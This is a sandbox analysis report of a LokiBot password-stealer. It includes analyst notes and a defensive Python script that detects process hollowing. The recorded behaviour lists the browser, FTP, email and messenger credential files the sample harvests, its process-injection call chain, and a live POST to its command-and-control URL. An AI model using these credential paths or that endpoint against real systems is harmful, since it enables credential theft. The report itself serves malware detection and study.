13.2
0-day

09ed1487ad28e1dffabd42618c997fe3d110ddb12e9cbc7d42ff5b2e7c74e010

c3eaf9846f5f3cea2361dc3fb3c6773b.exe

Analysis time: 91s

Last analysis

File size: 871.0KB
Static detection / dynamic detection: 100%. Detection tags: 2GW@AIDM5PNI, AI SCORE=86, ANDROM, AUTO, AWGP, BTPAZW, CONFIDENCE, DELPHILESS, EDUW, FAREIT, GENERICKD, HFHJZD, HIGH CONFIDENCE, ICUUJ, IGENT, KLVY, KTSE, LOKI, LOKIBOT, MALICIOUS PE, MALWARE@#26FJPB19XJURF, PASSWORDSTEALER, PUQS26, PUTTY, R + TROJ, SCORE, SIGGEN9, SMDF, STATIC AI, SUSGEN, UNSAFE, X2059, ZELPHIF
鹰眼引擎 (Eagle Eye engine)
Not detected: no Eagle Eye engine result for this sample
Static verdict
Antivirus engines
Engine | Result | Scan date | Engine version
Alibaba | Backdoor:Win32/Androm.9e0518c6 | 20190527 | 0.3.0.5
Baidu | (no detection) | 20190318 | 1.0.0.2
Avast | Other:Malware-gen [Trj] | 20201228 | 21.1.5827.0
Kingsoft | (no detection) | 20201228 | 2017.9.26.565
McAfee | Fareit-FRQ!C3EAF9846F5F | 20201228 | 6.0.6.653
Tencent | Win32.Trojan.Inject.Auto | 20201228 | 1.0.0.1
CrowdStrike | win/malicious_confidence_100% (W) | 20190702 | 1.0
Static indicators
Queries for the computername (3 events)
Time & API Arguments Status Return Repeated
1619867300.46075
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619867301.83575
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619867302.60175
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Tries to locate where the browsers are installed (1 event)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Checks the amount of memory in the system; this can be used to detect virtual machines that have little memory available (1 event)
Time & API Arguments Status Return Repeated
1619867297.14875
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)
section CODE
section DATA
section BSS
CODE, DATA and BSS are the standard section names written by the Borland/Delphi linker, so by themselves they say "Delphi build" rather than "packer"; the signature below is a Delphi-compiler signature as well, and both agree with the Delphi-flavoured AV names further down (Delphiless, Zelphif).
The executable uses a known packer (1 event)
packer BobSoft Mini Delphi -> BoB / BobSoft
One or more processes crashed (1 event)
The exception below is 0xc0000094 (STATUS_INTEGER_DIVIDE_BY_ZERO) raised by `div eax` with eax = 0. PID 2440 does not die: it is still running at 1619867294.7 when it performs the process injection recorded further down. The bytes that follow the faulting instruction (xor eax,eax; pop edx; pop ecx; pop ecx; mov fs:[eax],edx) are the epilogue of a Delphi try/except block unlinking its SEH frame, so this reads as a deliberate, handled exception of the kind used to trip debuggers and emulators, not a genuine crash.
Time & API Arguments Status Return Repeated
1619867293.554875
__exception__
stacktrace:
c3eaf9846f5f3cea2361dc3fb3c6773b+0x98ef2 @ 0x498ef2
c3eaf9846f5f3cea2361dc3fb3c6773b+0x3e1b @ 0x403e1b
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 1637912
registers.edi: 4820772
registers.eax: 0
registers.ebp: 1638204
registers.edx: 2130566132
registers.ebx: 0
registers.esi: 86
registers.ecx: 347406336
exception.instruction_r: f7 f0 90 90 90 90 33 c0 5a 59 59 64 89 10 eb 15
exception.symbol: c3eaf9846f5f3cea2361dc3fb3c6773b+0x98cd4
exception.instruction: div eax
exception.module: c3eaf9846f5f3cea2361dc3fb3c6773b.exe
exception.exception_code: 0xc0000094
exception.offset: 625876
exception.address: 0x498cd4
success 0 0
Behavioral verdict
Dynamic indicators
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)
suspicious_features: POST method with no referer header, HTTP version 1.0 used
suspicious_request: POST http://fllxprint.com/loki/Panel/fre.php
Performs some HTTP requests (1 event)
request POST http://fllxprint.com/loki/Panel/fre.php
Sends data using the HTTP POST Method (1 event)
request POST http://fllxprint.com/loki/Panel/fre.php
Allocates read-write-execute memory (usually to unpack itself) (3 events)
Time & API Arguments Status Return Repeated
1619867293.288875
NtAllocateVirtualMemory
process_identifier: 2440
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003f0000
success 0 0
1619867293.601875
NtAllocateVirtualMemory
process_identifier: 2440
region_size: 24576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x005e0000
success 0 0
1619867294.460875
NtAllocateVirtualMemory
process_identifier: 2440
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00600000
success 0 0
Steals private information from local Internet browsers (19 events)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (3 events)
Moves the original executable to a new location (1 event)
The destination follows the pattern %APPDATA%\<6 hex chars>\<6 hex chars>.exe. The names are generated per host (the sample read MachineGuid earlier, and this family is documented to derive the names from it), so hunt on the pattern and on the move out of %TEMP%, not on the literal 6ED2B0\0019EA.exe.
Time & API Arguments Status Return Repeated
1619867302.55475
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\c3eaf9846f5f3cea2361dc3fb3c6773b.exe
newfilepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\6ED2B0\0019EA.exe
newfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\6ED2B0\0019EA.exe
flags: 1
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\c3eaf9846f5f3cea2361dc3fb3c6773b.exe
success 1 0
The binary likely contains encrypted or compressed data indicative of a packer (1 event)
entropy 7.155913005727606 | section .rsrc | virtual_address 0x000b9000 | virtual_size 0x0002694c | size_of_data 0x00026a00 | description: A section with a high entropy has been found (the resource section; consistent with a payload stored as a resource, which fits the FindResourceA/LoadResource/LockResource imports listed later)
Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)
Time & API Arguments Status Return Repeated
1619867301.52375
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
Network communication
Communicates with host for which no DNS query was performed (1 event)
host 172.217.24.14 (Google address space, reached without a preceding lookup; more likely OS background traffic than sample C2, the sample's own traffic is the fllxprint.com POSTs)
Harvests credentials from local FTP client software (22 events)
file C:\Program Files (x86)\FTPGetter\Profile\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FTPGetter\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\wcx_ftp.ini
file C:\Windows\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\GHISLER\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\wcx_ftp.ini
file C:\Windows\32BitFtp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Program Files (x86)\FileZilla\Filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Ghisler\Total Commander
registry HKEY_CURRENT_USER\Software\VanDyke\SecureFX
registry HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
registry HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
registry HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
registry HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
registry HKEY_CURRENT_USER\Software\Martin Prikryl
registry HKEY_LOCAL_MACHINE\Software\Martin Prikryl
Harvests information related to installed instant messenger clients (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\.purple\accounts.xml
Harvests credentials from local email clients (3 events)
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
registry HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)
Process injection Process 2440 called NtSetContextThread to modify thread in remote process 2476
Time & API Arguments Status Return Repeated
1619867294.741875
NtSetContextThread
thread_handle: 0x00000100
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2476
success 0 0
Putty Files, Registry Keys and/or Mutexes Detected
Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)
Process injection Process 2440 resumed a thread in remote process 2476
Time & API Arguments Status Return Repeated
1619867295.366875
NtResumeThread
thread_handle: 0x00000100
suspend_count: 1
process_identifier: 2476
success 0 0
Executed a process and injected code into it, probably while unpacking (7 events)
The calls below are a textbook process-hollowing chain: 2440 starts a second copy of itself suspended (CREATE_SUSPENDED), unmaps the original image at 0x00400000, maps a 663552-byte RWX section in its place, then rewrites the main thread's context and resumes it. In the NtSetContextThread call, eax = 4274654 (0x4139DE) is the new entry point and ebx = 2130567168 (0x7EFDE000) is the child's PEB: on x86 the initial thread of a suspended process carries its entry point in eax and the PEB address in ebx, so changing eax alone is enough for the hollowed image to run. The second NtResumeThread (handle 0x110, three seconds later) is a further thread in the same child.
Time & API Arguments Status Return Repeated
1619867294.726875
CreateProcessInternalW
thread_identifier: 1816
thread_handle: 0x00000100
process_identifier: 2476
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\c3eaf9846f5f3cea2361dc3fb3c6773b.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000104
inherit_handles: 0
success 1 0
1619867294.726875
NtUnmapViewOfSection
process_identifier: 2476
region_size: 4096
process_handle: 0x00000104
base_address: 0x00400000
success 0 0
1619867294.726875
NtMapViewOfSection
section_handle: 0x0000010c
process_identifier: 2476
commit_size: 663552
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000104
allocation_type: 0 ()
section_offset: 0
view_size: 663552
base_address: 0x00400000
success 0 0
1619867294.741875
NtGetContextThread
thread_handle: 0x00000100
success 0 0
1619867294.741875
NtSetContextThread
thread_handle: 0x00000100
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2476
success 0 0
1619867295.366875
NtResumeThread
thread_handle: 0x00000100
suspend_count: 1
process_identifier: 2476
success 0 0
1619867298.24175
NtResumeThread
thread_handle: 0x00000110
suspend_count: 1
process_identifier: 2476
success 0 0
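The seven calls above are the whole sequence, and that ordered sequence per target PID is what a detection should key on rather than any single RWX allocation. The following Python is an added example, not code from the sandbox, the report's vendor or the sample: it parses the report's own "timestamp / API / key: value / status" event layout (the log inside it is constructed from the events listed above), groups events by target PID, and reports a finding only when create-suspended, unmap, map-or-write, set-context and resume all occur in order against the same PID. The alternative API names in the chain table (the Zw* and Write* variants) are assumptions covering other injectors, not calls this report recorded.

```python
"""Correlate sandbox API events into a process-hollowing chain.

Added example, not code from the sandbox or the sample. SAMPLE_LOG is
constructed from the report's events for PID 2440 -> 2476.
"""
import re
from collections import defaultdict

SAMPLE_LOG = """\
1619867294.726875
CreateProcessInternalW
process_identifier: 2476
creation_flags: 4 (CREATE_SUSPENDED)
success 1 0
1619867294.726875
NtUnmapViewOfSection
process_identifier: 2476
base_address: 0x00400000
success 0 0
1619867294.726875
NtMapViewOfSection
process_identifier: 2476
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
view_size: 663552
base_address: 0x00400000
success 0 0
1619867294.741875
NtSetContextThread
registers.eax: 4274654
registers.ebx: 2130567168
process_identifier: 2476
success 0 0
1619867295.366875
NtResumeThread
suspend_count: 1
process_identifier: 2476
success 0 0
"""

TS_RE = re.compile(r"^\d+\.\d+$")
KV_RE = re.compile(r"^([\w.]+):\s*(.*)$")


def parse_events(text):
    """Turn the report's flat event text into dicts: ts, api, args, status."""
    events, cur = [], None
    for line in text.splitlines():
        if TS_RE.match(line):                    # a bare float starts a new event
            cur = {"ts": float(line), "api": None, "args": {}, "status": None}
            events.append(cur)
        elif cur is None:
            continue
        elif cur["api"] is None:                 # first line after the timestamp
            cur["api"] = line.strip()
        elif line.startswith(("success", "failed")):
            cur["status"] = line.split()[0]
        else:
            m = KV_RE.match(line)
            if m:
                cur["args"][m.group(1)] = m.group(2)
    return events


# One entry per step: the APIs that satisfy it and a predicate on the arguments.
# Step 3 accepts either way of placing the new image: section mapping (as in
# this report) or a direct write into the target. Names other than the ones
# the report logged are assumptions covering other injectors.
HOLLOWING_CHAIN = [
    ({"CreateProcessInternalW", "CreateProcessW", "CreateProcessA"},
     lambda a: "CREATE_SUSPENDED" in a.get("creation_flags", "")),
    ({"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}, lambda a: True),
    ({"NtMapViewOfSection", "NtWriteVirtualMemory", "WriteProcessMemory"},
     lambda a: "EXECUTE" in a.get("win32_protect", "EXECUTE")),
    ({"NtSetContextThread", "SetThreadContext"}, lambda a: True),
    ({"NtResumeThread", "ResumeThread"}, lambda a: True),
]


def find_hollowing(events):
    """Return {target_pid: details} for every PID that sees the full chain in order."""
    by_pid = defaultdict(list)
    for ev in events:
        if "process_identifier" in ev["args"]:
            by_pid[ev["args"]["process_identifier"]].append(ev)
    findings = {}
    for pid, evs in by_pid.items():
        step, matched = 0, []
        for ev in sorted(evs, key=lambda e: e["ts"]):   # stable: keeps log order on ties
            apis, pred = HOLLOWING_CHAIN[step]
            if ev["api"] in apis and pred(ev["args"]):
                matched.append(ev)
                step += 1
                if step == len(HOLLOWING_CHAIN):
                    break
        if step == len(HOLLOWING_CHAIN):
            ctx = matched[3]["args"]                 # the set-context arguments
            findings[pid] = {
                "image_base": matched[1]["args"].get("base_address"),
                "image_size": int(matched[2]["args"].get("view_size", 0)),
                # x86: a suspended initial thread holds the entry point in eax
                # and the PEB address in ebx; the injector rewrites eax.
                "new_entry_point": int(ctx["registers.eax"]),
                "peb": int(ctx["registers.ebx"]),
            }
    return findings
```

`find_hollowing(parse_events(SAMPLE_LOG))` returns a single finding for PID 2476: image base 0x00400000, 663552 bytes, new entry point 0x4139DE, PEB 0x7EFDE000. Because the chain is matched per target PID and in order, the RWX allocations 2440 makes in its own address space (listed earlier in the report) do not trigger it on their own.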
File has been identified by 60 AntiVirus engines on VirusTotal as malicious (50 of 60 events shown)
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.PasswordStealer.GenericKD.45109841
CAT-QuickHeal Backdoor.Androm
ALYac Trojan.PasswordStealer.GenericKD.45109841
Cylance Unsafe
Sangfor Malware
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Backdoor:Win32/Androm.9e0518c6
K7GW Riskware ( 0040eff71 )
Cybereason malicious.46f5f3
Arcabit Trojan.PasswordStealer.Generic.D2B05251
Cyren W32/Trojan.KLVY-6700
Symantec Trojan.Gen.2
APEX Malicious
Avast Other:Malware-gen [Trj]
Kaspersky HEUR:Backdoor.Win32.Androm.gen
BitDefender Trojan.PasswordStealer.GenericKD.45109841
NANO-Antivirus Trojan.Win32.Androm.hfhjzd
Paloalto generic.ml
AegisLab Trojan.Win32.Androm.m!c
Rising Trojan.Lokibot!8.F1B5 (KTSE)
Ad-Aware Trojan.PasswordStealer.GenericKD.45109841
Sophos Mal/Generic-R + Troj/Fareit-KBT
Comodo Malware@#26fjpb19xjurf
F-Secure Trojan.TR/Agent.icuuj
DrWeb Trojan.Siggen9.22410
VIPRE Trojan.Win32.Generic!BT
TrendMicro TrojanSpy.Win32.LOKI.SMDF.hp
McAfee-GW-Edition BehavesLike.Win32.Fareit.ch
MaxSecure Trojan.Malware.300983.susgen
FireEye Generic.mg.c3eaf9846f5f3cea
Emsisoft Trojan.PasswordStealer.GenericKD.45109841 (B)
SentinelOne Static AI - Malicious PE
Jiangmin Backdoor.Androm.awgp
Webroot W32.Trojan.Gen
Avira TR/Agent.icuuj
MAX malware (ai score=86)
Antiy-AVL Trojan[Backdoor]/Win32.Androm
Gridinsoft Trojan.Win32.LokiBot.oa!s1
Microsoft Trojan:Win32/Loki.XR!MTB
ZoneAlarm HEUR:Backdoor.Win32.Androm.gen
GData Win32.Trojan.Agent.PUQS26
Cynet Malicious (score: 100)
AhnLab-V3 Suspicious/Win.Delphiless.X2059
McAfee Fareit-FRQ!C3EAF9846F5F
VBA32 Backdoor.Androm
Malwarebytes Spyware.LokiBot
Zoner Trojan.Win32.89982
ESET-NOD32 Win32/PSW.Fareit.L
TrendMicro-HouseCall TrojanSpy.Win32.LOKI.SMDF.hp
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 events)
dead_host 172.217.24.14:443
dead_host 172.217.27.142:443
Both addresses are in Google's 172.217.0.0/16 range, no port-443 connection appears in the TCP table below, and the sample's only recorded requests go to fllxprint.com over port 80; treat these as OS or sandbox background traffic rather than as C2.
Visual analysis
Binary image
No binary image: the sample did not produce a binary visualization image
Runtime screenshots
No runtime screenshots: no screenshots were produced while the sample ran


PE Compile Time

1992-04-24 04:34:54 (not a credible build date for a binary that uses these APIs and contacts this gate; the Delphi toolchain identified above is known to write fixed, bogus link timestamps, so do not use this value for timelining)

Imports (several libraries appear more than once below; one import descriptor per unit is typical of Delphi-built executables)

Library kernel32.dll:
0x4a7164 VirtualFree
0x4a7168 VirtualAlloc
0x4a716c LocalFree
0x4a7170 LocalAlloc
0x4a7174 GetVersion
0x4a7178 GetCurrentThreadId
0x4a7184 VirtualQuery
0x4a7188 WideCharToMultiByte
0x4a718c MultiByteToWideChar
0x4a7190 lstrlenA
0x4a7194 lstrcpynA
0x4a7198 LoadLibraryExA
0x4a719c GetThreadLocale
0x4a71a0 GetStartupInfoA
0x4a71a4 GetProcAddress
0x4a71a8 GetModuleHandleA
0x4a71ac GetModuleFileNameA
0x4a71b0 GetLocaleInfoA
0x4a71b4 GetCommandLineA
0x4a71b8 FreeLibrary
0x4a71bc FindFirstFileA
0x4a71c0 FindClose
0x4a71c4 ExitProcess
0x4a71c8 WriteFile
0x4a71d0 RtlUnwind
0x4a71d4 RaiseException
0x4a71d8 GetStdHandle
Library user32.dll:
0x4a71e0 GetKeyboardType
0x4a71e4 LoadStringA
0x4a71e8 MessageBoxA
0x4a71ec CharNextA
Library advapi32.dll:
0x4a71f4 RegQueryValueExA
0x4a71f8 RegOpenKeyExA
0x4a71fc RegCloseKey
Library oleaut32.dll:
0x4a7204 SysFreeString
0x4a7208 SysReAllocStringLen
0x4a720c SysAllocStringLen
Library kernel32.dll:
0x4a7214 TlsSetValue
0x4a7218 TlsGetValue
0x4a721c LocalAlloc
0x4a7220 GetModuleHandleA
Library advapi32.dll:
0x4a7228 RegQueryValueExA
0x4a722c RegOpenKeyExA
0x4a7230 RegCloseKey
Library kernel32.dll:
0x4a7238 lstrcpyA
0x4a723c WriteFile
0x4a7240 WaitForSingleObject
0x4a7244 VirtualQuery
0x4a7248 VirtualFree
0x4a724c VirtualAlloc
0x4a7250 Sleep
0x4a7254 SizeofResource
0x4a7258 SetThreadLocale
0x4a725c SetFilePointer
0x4a7260 SetEvent
0x4a7264 SetErrorMode
0x4a7268 SetEndOfFile
0x4a726c SearchPathA
0x4a7270 ResetEvent
0x4a7274 ReleaseMutex
0x4a7278 ReadFile
0x4a727c OpenFileMappingA
0x4a7280 MultiByteToWideChar
0x4a7284 MulDiv
0x4a7288 LockResource
0x4a728c LoadResource
0x4a7290 LoadLibraryA
0x4a7298 IsDBCSLeadByte
0x4a72a0 GlobalUnlock
0x4a72a4 GlobalSize
0x4a72a8 GlobalReAlloc
0x4a72ac GlobalHandle
0x4a72b0 GlobalLock
0x4a72b4 GlobalFree
0x4a72b8 GlobalFindAtomA
0x4a72bc GlobalDeleteAtom
0x4a72c0 GlobalAlloc
0x4a72c4 GlobalAddAtomA
0x4a72c8 GetVersionExA
0x4a72cc GetVersion
0x4a72d0 GetUserDefaultLCID
0x4a72d4 GetTickCount
0x4a72d8 GetThreadLocale
0x4a72dc GetSystemInfo
0x4a72e0 GetStringTypeExA
0x4a72e4 GetStdHandle
0x4a72e8 GetProcAddress
0x4a72ec GetModuleHandleA
0x4a72f0 GetModuleFileNameA
0x4a72f4 GetLocaleInfoA
0x4a72f8 GetLocalTime
0x4a72fc GetLastError
0x4a7300 GetFullPathNameA
0x4a7304 GetDiskFreeSpaceA
0x4a7308 GetDateFormatA
0x4a730c GetCurrentThreadId
0x4a7310 GetCurrentProcessId
0x4a7318 GetComputerNameA
0x4a731c GetCPInfo
0x4a7320 GetACP
0x4a7324 FreeResource
0x4a732c InterlockedExchange
0x4a7334 FreeLibrary
0x4a7338 FormatMessageA
0x4a733c FindResourceA
0x4a7340 FindFirstFileA
0x4a7344 FindClose
0x4a7348 FatalAppExitA
0x4a734c EnumCalendarInfoA
0x4a7358 CreateThread
0x4a735c CreateMutexA
0x4a7360 CreateFileA
0x4a7364 CreateEventA
0x4a7368 CompareStringA
0x4a736c CloseHandle
Library version.dll:
0x4a7374 VerQueryValueA
0x4a737c GetFileVersionInfoA
Library gdi32.dll:
0x4a7384 UnrealizeObject
0x4a7388 StretchBlt
0x4a738c SetWindowOrgEx
0x4a7390 SetWinMetaFileBits
0x4a7394 SetViewportOrgEx
0x4a7398 SetTextColor
0x4a739c SetStretchBltMode
0x4a73a0 SetROP2
0x4a73a4 SetPixel
0x4a73a8 SetMapMode
0x4a73ac SetEnhMetaFileBits
0x4a73b0 SetDIBColorTable
0x4a73b4 SetBrushOrgEx
0x4a73b8 SetBkMode
0x4a73bc SetBkColor
0x4a73c0 SelectPalette
0x4a73c4 SelectObject
0x4a73c8 SaveDC
0x4a73cc RestoreDC
0x4a73d0 Rectangle
0x4a73d4 RectVisible
0x4a73d8 RealizePalette
0x4a73dc PlayEnhMetaFile
0x4a73e0 PatBlt
0x4a73e4 MoveToEx
0x4a73e8 MaskBlt
0x4a73ec LineTo
0x4a73f0 LPtoDP
0x4a73f4 IntersectClipRect
0x4a73f8 GetWindowOrgEx
0x4a73fc GetWinMetaFileBits
0x4a7400 GetTextMetricsA
0x4a740c GetStockObject
0x4a7410 GetPixel
0x4a7414 GetPaletteEntries
0x4a7418 GetObjectA
0x4a7428 GetEnhMetaFileBits
0x4a742c GetDeviceCaps
0x4a7430 GetDIBits
0x4a7434 GetDIBColorTable
0x4a7438 GetDCOrgEx
0x4a7440 GetClipBox
0x4a7444 GetBrushOrgEx
0x4a7448 GetBitmapBits
0x4a744c ExcludeClipRect
0x4a7450 DeleteObject
0x4a7454 DeleteEnhMetaFile
0x4a7458 DeleteDC
0x4a745c CreateSolidBrush
0x4a7460 CreatePenIndirect
0x4a7464 CreatePen
0x4a7468 CreatePalette
0x4a7470 CreateFontIndirectA
0x4a7474 CreateEnhMetaFileA
0x4a7478 CreateDIBitmap
0x4a747c CreateDIBSection
0x4a7480 CreateCompatibleDC
0x4a7488 CreateBrushIndirect
0x4a748c CreateBitmap
0x4a7490 CopyEnhMetaFileA
0x4a7494 CloseEnhMetaFile
0x4a7498 BitBlt
Library opengl32.dll:
0x4a74a0 wglDeleteContext
Library user32.dll:
0x4a74a8 CreateWindowExA
0x4a74ac WindowFromPoint
0x4a74b0 WinHelpA
0x4a74b4 WaitMessage
0x4a74b8 ValidateRect
0x4a74bc UpdateWindow
0x4a74c0 UnregisterClassA
0x4a74c4 UnhookWindowsHookEx
0x4a74c8 TranslateMessage
0x4a74d0 TrackPopupMenu
0x4a74d8 ShowWindow
0x4a74dc ShowScrollBar
0x4a74e0 ShowOwnedPopups
0x4a74e4 ShowCursor
0x4a74e8 SetWindowsHookExA
0x4a74ec SetWindowPos
0x4a74f0 SetWindowPlacement
0x4a74f4 SetWindowLongA
0x4a74f8 SetTimer
0x4a74fc SetScrollRange
0x4a7500 SetScrollPos
0x4a7504 SetScrollInfo
0x4a7508 SetRect
0x4a750c SetPropA
0x4a7510 SetParent
0x4a7514 SetMenuItemInfoA
0x4a7518 SetMenu
0x4a751c SetForegroundWindow
0x4a7520 SetFocus
0x4a7524 SetCursor
0x4a7528 SetClassLongA
0x4a752c SetCapture
0x4a7530 SetActiveWindow
0x4a7534 SendMessageA
0x4a7538 ScrollWindow
0x4a753c ScreenToClient
0x4a7540 RemovePropA
0x4a7544 RemoveMenu
0x4a7548 ReleaseDC
0x4a754c ReleaseCapture
0x4a7558 RegisterClassA
0x4a755c RedrawWindow
0x4a7560 PtInRect
0x4a7564 PostQuitMessage
0x4a7568 PostMessageA
0x4a756c PeekMessageA
0x4a7570 OffsetRect
0x4a7574 OemToCharBuffA
0x4a7578 OemToCharA
0x4a757c MessageBoxA
0x4a7580 MapWindowPoints
0x4a7584 MapVirtualKeyA
0x4a7588 LoadStringA
0x4a758c LoadKeyboardLayoutA
0x4a7590 LoadIconA
0x4a7594 LoadCursorA
0x4a7598 LoadBitmapA
0x4a759c KillTimer
0x4a75a0 IsZoomed
0x4a75a4 IsWindowVisible
0x4a75a8 IsWindowEnabled
0x4a75ac IsWindow
0x4a75b0 IsRectEmpty
0x4a75b4 IsIconic
0x4a75b8 IsDialogMessageA
0x4a75bc IsChild
0x4a75c0 InvalidateRect
0x4a75c4 IntersectRect
0x4a75c8 InsertMenuItemA
0x4a75cc InsertMenuA
0x4a75d0 InflateRect
0x4a75d8 GetWindowTextA
0x4a75dc GetWindowRect
0x4a75e0 GetWindowPlacement
0x4a75e4 GetWindowLongA
0x4a75e8 GetWindowDC
0x4a75ec GetTopWindow
0x4a75f0 GetSystemMetrics
0x4a75f4 GetSystemMenu
0x4a75f8 GetSysColorBrush
0x4a75fc GetSysColor
0x4a7600 GetSubMenu
0x4a7604 GetScrollRange
0x4a7608 GetScrollPos
0x4a760c GetScrollInfo
0x4a7610 GetPropA
0x4a7614 GetParent
0x4a7618 GetWindow
0x4a761c GetMessageTime
0x4a7620 GetMenuStringA
0x4a7624 GetMenuState
0x4a7628 GetMenuItemInfoA
0x4a762c GetMenuItemID
0x4a7630 GetMenuItemCount
0x4a7634 GetMenu
0x4a7638 GetLastActivePopup
0x4a763c GetKeyboardState
0x4a7644 GetKeyboardLayout
0x4a7648 GetKeyState
0x4a764c GetKeyNameTextA
0x4a7650 GetIconInfo
0x4a7654 GetForegroundWindow
0x4a7658 GetFocus
0x4a765c GetDesktopWindow
0x4a7660 GetDCEx
0x4a7664 GetDC
0x4a7668 GetCursorPos
0x4a766c GetCursor
0x4a7670 GetClipboardData
0x4a7674 GetClientRect
0x4a7678 GetClassNameA
0x4a767c GetClassInfoA
0x4a7680 GetCapture
